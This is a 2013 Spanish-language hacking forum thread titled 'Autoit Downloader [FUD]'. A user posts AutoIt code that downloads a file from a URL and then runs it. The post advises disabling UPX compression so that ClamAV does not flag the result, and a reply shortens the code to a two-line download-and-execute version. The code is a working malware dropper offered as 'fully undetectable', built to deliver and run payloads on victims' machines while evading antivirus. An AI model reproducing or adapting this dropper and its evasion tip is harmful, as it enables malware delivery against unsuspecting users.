[SCR] Autoit Downloader [FUD]

Iniciado por k0ws, Enero 18, 2013, 05:37:39 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 18, 2013, 05:37:39 AM Ultima modificación: Enero 31, 2013, 02:09:17 PM por k0ws
Bueno, sin mas aqui les dejo este simple code, se me paso por la mente ya que le estaba dando un vistazo a la biblioteca Inet.au3.

Código: autoit
;Author k0ws
;Web:Underc[0]de.org
;---------------------------------------------
#include <Inet.au3>;Biblioteca Inet,permite el manejo de la web.
;---------------------------------------------
_Down("URL","ARCHIVO O LOCALIZACION");Funcion de 2 variables(Url,Nombre archivo)
ShellExecute("ARCHIVO O LOCALIZACION")
;---------------------------------------------
Func _Down($url,$file);Comienzo de la Funcion
InetGet($url,$file);InetGet = Download
EndFunc ;Cierre de la funcion


Si les salta el clamav, desactiven la funcion UPX en Aut2Exe.

Scan: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-Saludos-

Ahora tambien le das a AutoIT? buen aporte man.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Pues si, le vi muy buen potencial y me dije: ¿Why not?

-Saludos-

No sera mejor así?

Código: php

#include <Inet.au3>

InetGet("URL", "ARCHIVO O LOCALIZACION");Descargar
ShellExecute("ARCHIVO O LOCALIZACION");Ejecutar